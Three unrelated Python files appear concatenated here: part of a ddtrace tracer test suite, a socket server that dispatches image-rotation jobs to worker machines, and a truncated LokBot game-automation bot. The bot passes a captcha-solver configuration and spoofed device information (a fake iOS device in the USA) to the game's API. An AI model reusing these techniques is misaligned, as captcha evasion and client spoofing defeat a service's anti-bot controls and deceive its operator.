When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters():
t = ddtrace.Tracer()
class FilterAll(object):
def process_trace(self, trace):
return None
t.configure(
settings={
"FILTERS": [FilterAll()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
t.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit():
t = ddtrace.Tracer()
t.writer = DummyWriter()
s1 = t.trace("1")
s2 = t.trace("2")
s1.finish()
s2.finish()
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = t.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = t.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = t.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
with tracer.trace("test") as s1:
assert tracer.active_span() == s1
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.active_span() == s2
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.active_span() == s3
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s3.span_id
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.active_span() == s4
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s4.span_id
assert tracer.active_span() == s1
assert tracer.active_root_span() == s1
assert tracer.active_span() is None
assert tracer.active_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = tracer.writer.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = tracer.writer.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.activate(ctx)
assert tracer.active_span() is None
with tracer.trace("test") as s1:
assert tracer.active_span() == s1
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
assert s1.parent_id is None
trace = tracer.writer.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.activate(ctx)
assert tracer.active_span() is None
assert (
tracer.get_call_context()
== tracer.active()
== Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
)
with tracer.trace("test2") as s2:
assert tracer.active_span() == s2
assert tracer.active_root_span() is s2
assert tracer.get_call_context().trace_id == s2.trace_id == 4321
assert tracer.get_call_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = tracer.writer.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep():
tracer = Tracer()
tracer.writer = DummyWriter()
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop():
tracer = Tracer()
tracer.writer = DummyWriter()
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop():
tracer = Tracer()
tracer.writer = DummyWriter()
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_non_active_span():
tracer = Tracer()
tracer.writer = DummyWriter()
with tracer.start_span("test", activate=False):
assert tracer.active_span() is None
assert tracer.active_root_span() is None
assert tracer.active_span() is None
assert tracer.active_root_span() is None
traces = tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
with tracer.start_span("test1", activate=False):
with tracer.start_span("test2", activate=False):
assert tracer.active_span() is None
assert tracer.active_root_span() is None
assert tracer.active_span() is None
assert tracer.active_root_span() is None
traces = tracer.writer.pop_traces()
assert len(traces) == 2
with tracer.start_span("active", activate=True) as active:
with tracer.start_span("non active", child_of=active, activate=False):
assert tracer.active() is active
assert tracer.active_root_span() is active
assert tracer.active() is active
assert tracer.active_root_span() is active
traces = tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
|
server.py
|
import socket
import types
import logging
import threading
import tokens
import random
from storage import Storage
from collections import deque
from connection import Connection
from clientConnection import ClientConnection
from minionConnection import MinionConnection
from message.literalMessage import LiteralMessage
MSG_SIZE = 1024
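# Typical usage, as a minimal sketch (the host and port values here are illustrative):
#     server = Server('0.0.0.0', 50007)
#     server.start()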
class Server:
def __init__(self, host, port=50007):
"""Initialize the server object.
Args:
port (int): Port.
"""
self.host = host
self.port = port
self.storage = Storage()
self.minions = deque()
self.minions_lock = threading.Lock()
self.clients = deque()
self.clients_lock = threading.Lock()
def start(self):
"""Starts the server process.
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(5)
logging.info("listening on {}:{}".format(self.host, self.port))
print("listening on ", (self.host, self.port))
listeningThread = threading.Thread(target=self.newConnectionTask, name='server_lister_thread')
listeningThread.start()
minionsThread = threading.Thread(target=self.minions_thread, name='minions_thread')
minionsThread.start()
clientThread = threading.Thread(target=self.clients_thread, name='clients_thread')
clientThread.start()
exit = False
while not exit:
command = input("Enter 'exit' to exit:")
if command.lower() == 'exit':
self.continueListening = False
self.continueMinions = False
self.continueClients = False
exit = True
listeningThread.join()
minionsThread.join()
clientThread.join()
def newConnectionTask(self):
self.continueListening = True
while self.continueListening:
try:
self.socket.settimeout(1)
conn, addr = self.socket.accept()
except BaseException:
self.socket.settimeout(None)
continue
self.socket.settimeout(None)
connection = Connection(conn, addr)
message = connection.receive_message()
connection.send_message(LiteralMessage(tokens.SUCESSFUL_CONNECTION))
connection = None
outputLog = "connected to {}:{} as a ".format(addr[0], addr[1])
if message.value == tokens.MINION_TOKEN:
self.minions_lock.acquire()
self.minions.append(MinionConnection(conn, addr))
self.minions_lock.release()
outputLog += "minion"
elif message.value == tokens.CLIENT_TOKEN:
self.clients_lock.acquire()
self.clients.append(ClientConnection(conn, addr))
self.clients_lock.release()
outputLog += "client"
else:
outputLog += "undefined"
logging.info(outputLog)
print(outputLog)
def minions_thread(self):
self.continueMinions = True
        while self.continueMinions:
self.minions_lock.acquire()
try:
minion = self.minions.popleft()
except IndexError:
self.minions_lock.release()
continue
try:
message = minion.receive_message(True, 1.0)
except Exception as e:
print(e)
logging.info(e)
                self.minions_lock.release()
continue
if message is not None:
message = message.value
if self.try_decode_storages(minion, message):
pass
else:
print("Unknown message of value '{}', sended by the minion '{}'".format(message, minion.get_addr()))
if not minion.is_closed():
self.minions.append(minion)
else:
print('')
self.minions_lock.release()
def clients_thread(self):
self.continueClients = True
        while self.continueClients:
self.clients_lock.acquire()
try:
client = self.clients.popleft()
except IndexError:
self.clients_lock.release()
continue
try:
message = client.receive_message(True, 1.0)
except Exception as e:
message = "client '{}':{}".format(client.get_addr(), e)
print(message)
logging.info(message)
self.clients_lock.release()
continue
if message is not None:
message = message.value
if self.try_decode_storages(client, message):
pass
elif self.try_decode_client_job(client, message):
pass
else:
print("Unknown message of value '{}', sended by the client '{}'".format(message, client.get_addr()))
if not client.is_closed():
self.clients.append(client)
self.clients_lock.release()
# close connections with clients
self.clients_lock.acquire()
for connection in self.clients:
connection.close()
self.clients_lock.release()
def try_decode_storages(self, connection, token):
try:
if token == tokens.GET_FILE_SIZE:
filename = connection.receive_message().value
size = self.storage.get_file_size(filename)
connection.send_message(LiteralMessage(size))
elif token == tokens.IS_FILE:
filename = connection.receive_message().value
result = self.storage.is_file(filename)
connection.send_message(LiteralMessage(result))
elif token == tokens.GET_NUMBER_OF_FILES:
number = self.storage.get_number_of_files()
connection.send_message(LiteralMessage(number))
elif token == tokens.GET_NAME_OF_FILE:
index = connection.receive_message().value
name = self.storage.get_name_of_file(index)
connection.send_message(LiteralMessage(name))
elif token == tokens.SAVE_FILE:
filename = connection.receive_message().value
data = connection.receive_message().value
self.storage.save_file(filename, data)
elif token == tokens.REMOVE_FILE:
filename = connection.receive_message().value
self.storage.remove_file(filename)
elif token == tokens.GET_FILE:
filename = connection.receive_message().value
data = self.storage.get_file(filename)
connection.send_message(LiteralMessage(data))
else:
return False
except BaseException as e:
connection.send_literal(tokens.ERROR_MESSAGE)
errorMessage = "The storege operation from '{}' resulted in a exception: {}".format(connection.get_addr(), e)
connection.send_literal(errorMessage)
logging.error(errorMessage)
print(errorMessage)
return True
def try_decode_client_job(self, connection, token):
filename = None
dstfilename = None
if (token == tokens.JOB_FLIP_HORIZONTAL or
token == tokens.JOB_FLIP_VERTICAL or
token == tokens.JOB_ROTATE_90 or
token == tokens.JOB_ROTATE_180 or
token == tokens.JOB_ROTATE_270):
filename = connection.receive_message().value
dstfilename = connection.receive_message().value
else:
return False
if not self.storage.is_file(filename) or self.storage.is_file(dstfilename):
connection.send_literal(tokens.ERROR_MESSAGE)
loginfotext = "The job of client {} is not valid, the filename '{}' not exists or the dstfilename '{}' exists.".format(
connection.get_addr(),
filename,
dstfilename
)
connection.send_literal(loginfotext)
logging.error(loginfotext)
print(loginfotext)
else:
self.minions_lock.acquire()
minionIndex = random.randrange(0, len(self.minions))
minion = self.minions[minionIndex]
imagedata = self.storage.get_file(filename)
coreIndex = minion.send_job(imagedata, dstfilename, token)
loginfotext = "The Job '{}' submitted successfully by ty the client {} to the core {} of the minion {}".format(
tokens.token_to_str(token),
connection.get_addr(),
coreIndex,
minion.get_addr()
)
connection.send_literal(tokens.INFO_MESSAGE)
connection.send_literal(loginfotext)
logging.info(loginfotext)
print(loginfotext)
self.minions_lock.release()
return True
|
farmer.py
|
import math
import random
import threading
import time
import arrow
import numpy
import socketio
import tenacity
from lokbot.client import LokBotApi
from lokbot import logger, builtin_logger
from lokbot.exceptions import OtherException
from lokbot.enum import *
from lokbot.util import get_resource_index_by_item_code, run_functions_in_random_order
# Ref: https://stackoverflow.com/a/16858283/6266737
def blockshaped(arr, nrows, ncols):
"""
Return an array of shape (n, nrows, ncols) where
n * nrows * ncols = arr.size
If arr is a 2D array, the returned array should look like n subblocks with
each subblock preserving the "physical" layout of arr.
"""
h, w = arr.shape
assert h % nrows == 0, f"{h} rows is not evenly divisible by {nrows}"
assert w % ncols == 0, f"{w} cols is not evenly divisible by {ncols}"
return (arr.reshape(h // nrows, nrows, -1, ncols)
.swapaxes(1, 2)
.reshape(-1, nrows, ncols))
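# A minimal illustration of blockshaped on a small example array:
#     blockshaped(numpy.arange(16).reshape(4, 4), 2, 2)
# yields four (2, 2) blocks in row-major block order:
#     [[0, 1], [4, 5]], [[2, 3], [6, 7]], [[8, 9], [12, 13]], [[10, 11], [14, 15]]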
# Ref: https://stackoverflow.com/a/432175/6266737
def ndindex(ndarray, item):
if len(ndarray.shape) == 1:
try:
return [ndarray.tolist().index(item)]
except:
pass
else:
for i, subarray in enumerate(ndarray):
try:
return [i] + ndindex(subarray, item)
except:
pass
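# A minimal illustration: ndindex(numpy.arange(9).reshape(3, 3), 4) returns [1, 1],
# the (row, column) index of the value 4; the function returns None if the item is absent.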
# Ref: https://stackoverflow.com/a/22550933/6266737
def neighbors(a, radius, row_number, column_number):
return [[a[i][j] if 0 <= i < len(a) and 0 <= j < len(a[0]) else 0
for j in range(column_number - 1 - radius, column_number + radius)]
for i in range(row_number - 1 - radius, row_number + radius)]
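# A minimal illustration: with a = [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
# neighbors(a, 1, 2, 2) returns the full 3x3 grid centred on the value 5
# (row and column numbers are 1-based); positions outside the grid are padded with 0.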
class LokFarmer:
def __init__(self, access_token, captcha_solver_config):
self.kingdom_enter = None
self.access_token = access_token
self.api = LokBotApi(access_token, captcha_solver_config, self._request_callback)
device_info = {
"OS": "iOS 15.3.1",
"country": "USA",
"language": "English",
"version": "1.1422.103.175",
"platform": "ios",
"build": "global"
}
self.kingdom_enter = self.api.kingdom_enter()
# knock moved to schedule job
self.api.auth_set_device_info(device_info)
self.api.chat_logs(self.kingdom_enter.get('kingdom').get('worldId'))
# [food, lumber, stone, gold]
self.resources = self.kingdom_enter.get('kingdom').get('resources')
self.buff_item_use_lock = threading.RLock()
self.march_start_lock = threading.RLock()
self.has_additional_building_queue = self.kingdom_enter.get('kingdom').get('vip', {}).get('level') >= 5
self.troop_queue = []
self.march_limit = 2
self._update_march_limit()
@staticmethod
def calc_time_diff_in_seconds(expected_ended):
time_diff = arrow.get(expected_ended) - arrow.utcnow()
diff_in_seconds = int(time_diff.total_seconds())
if diff_in_seconds < 0:
diff_in_seconds = 0
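        # add a small random delay (5-10 s) on top of the expected end time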
return diff_in_seconds + random.randint(5, 10)
def _is_building_upgradeable(self, building, buildings):
if building.get('state') != BUILDING_STATE_NORMAL:
return False
        # ignore the hall of alliance for now
if building.get('code') == BUILDING_CODE_MAP['hall_of_alliance']:
return False
building_level = building.get('level')
current_building_json = building_json.get(building.get('code'))
if not current_building_json:
return False
next_level_building_json = current_building_json.get(str(building_level + 1))
for requirement in next_level_building_json.get('requirements'):
req_level = requirement.get('level')
req_type = requirement.get('type')
req_code = BUILDING_CODE_MAP.get(req_type)
if not [b for b in buildings if b.get('code') == req_code and b.get('level') >= req_level]:
return False
for res_requirement in next_level_building_json.get('resources'):
req_value = res_requirement.get('value')
req_type = res_requirement.get('type')
if self.resources[RESOURCE_IDX_MAP[req_type]] < req_value:
return False
return True
def _is_researchable(self, academy_level, category_name, research_name, exist_researches, to_max_level=False):
research_category = RESEARCH_CODE_MAP.get(category_name)
research_code = research_category.get(research_name)
exist_research = [each for each in exist_researches if each.get('code') == research_code]
current_research_json = research_json.get(research_code)
# already finished
if exist_research and exist_research[0].get('level') >= int(current_research_json[-1].get('level')):
return False
# minimum required level only
if not to_max_level and \
exist_research and \
exist_research[0].get('level') >= RESEARCH_MINIMUM_LEVEL_MAP.get(category_name).get(research_name, 0):
return False
next_level_research_json = current_research_json[0]
if exist_research:
next_level_research_json = current_research_json[exist_research[0].get('level')]
for requirement in next_level_research_json.get('requirements'):
req_level = int(requirement.get('level'))
req_type = requirement.get('type')
            # check the academy level requirement
if req_type == 'academy' and req_level > academy_level:
return False
            # check whether the prerequisite research is finished
if req_type != 'academy' and not [each for each in exist_researches if
each.get('code') == research_category.get(req_type)
and each.get('level') >= req_level]:
return False
for res_requirement in next_level_research_json.get('resources'):
req_value = int(res_requirement.get('value'))
req_type = res_requirement.get('type')
if self.resources[RESOURCE_IDX_MAP[req_type]] < req_value:
return False
return True
def _update_kingdom_enter_building(self, building):
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
self.kingdom_enter['kingdom']['buildings'] = [
b for b in buildings if
b.get('position') != building.get('position')
] + [building]
def _request_callback(self, json_response):
resources = json_response.get('resources')
if resources and len(resources) == 4:
logger.info(f'resources updated: {resources}')
self.resources = resources
def _upgrade_building(self, building, buildings, task_code):
if not self._is_building_upgradeable(building, buildings):
return 'continue'
try:
if building.get('level') == 0:
res = self.api.kingdom_building_build(building)
building = res.get('newBuilding', building)
else:
res = self.api.kingdom_building_upgrade(building)
building = res.get('updateBuilding', building)
except OtherException as error_code:
if str(error_code) == 'full_task':
logger.warning('building_farmer: full_task, quit')
return 'break'
logger.info(f'building upgrade failed: {building}')
return 'continue'
building['level'] += 1
self._update_kingdom_enter_building(building)
# TODO: it's necessary only when their server is not stable
building['state'] = BUILDING_STATE_NORMAL
threading.Timer(
self.calc_time_diff_in_seconds(res.get('newTask').get('expectedEnded')) - 5,
self._update_kingdom_enter_building,
[building]
        ).start()
threading.Timer(
self.calc_time_diff_in_seconds(res.get('newTask').get('expectedEnded')),
self.building_farmer_thread,
[task_code]
).start()
return
def _alliance_help_all(self):
try:
self.api.alliance_help_all()
except OtherException:
pass
def _alliance_research_donate_all(self):
try:
research_list = self.api.alliance_research_list()
except OtherException:
return
code = research_list.get('recommendResearch')
if not code:
            code = 31101003  # cavalry attack, level 1
try:
self.api.alliance_research_donate_all(code)
except OtherException:
pass
def _alliance_shop_autobuy(self, item_code_list=(ITEM_CODE_VIP_100,)):
try:
shop_list = self.api.alliance_shop_list()
except OtherException:
return
alliance_point = shop_list.get('alliancePoint')
shop_items = shop_list.get('allianceShopItems')
for each_shop_item in shop_items:
code = each_shop_item.get('code')
if code not in item_code_list:
continue
cost = each_shop_item.get('ap_1') # or 'ap_2'?
amount = each_shop_item.get('amount')
minimum_buy_amount = int(alliance_point / cost)
if minimum_buy_amount < 1:
continue
self.api.alliance_shop_buy(code, amount if amount < minimum_buy_amount else minimum_buy_amount)
def _get_land_with_level(self):
rank = self.api.field_worldmap_devrank().get('lands')
land_with_level = [[], [], [], [], [], [], [], [], [], []]
for index, level in enumerate(rank):
# land id start from 100000
land_with_level[int(level)].append(100000 + index)
return land_with_level
@staticmethod
def _get_land_array():
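        # 65536 land ids (100000..165535) laid out as a 256x256 grid (assumed to mirror the world map)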
return numpy.arange(100000, 165536).reshape(256, 256)
def _get_nearest_land(self, x, y, radius=32):
land_array = self._get_land_array()
# current_land_id = land_array[y // 8, x // 8]
nearby_land_ids = neighbors(land_array, radius, y // 8 + 1, x // 8 + 1)
nearby_land_ids = [item for sublist in nearby_land_ids for item in sublist if item != 0]
land_with_level = self._get_land_with_level()
lands = []
for index, each_level in enumerate(reversed(land_with_level)):
level = 10 - index
if level < 3:
continue
lands += [(each_land_id, level) for each_land_id in each_level if each_land_id in nearby_land_ids]
return lands
def _get_top_leveled_land(self, limit=1024):
land_with_level = self._get_land_with_level()
lands = []
for index, each_level in enumerate(reversed(land_with_level)):
level = 10 - index
if level < 2:
continue
if len(each_level) > limit:
return lands + each_level[:limit]
lands += [(each, level) for each in each_level]
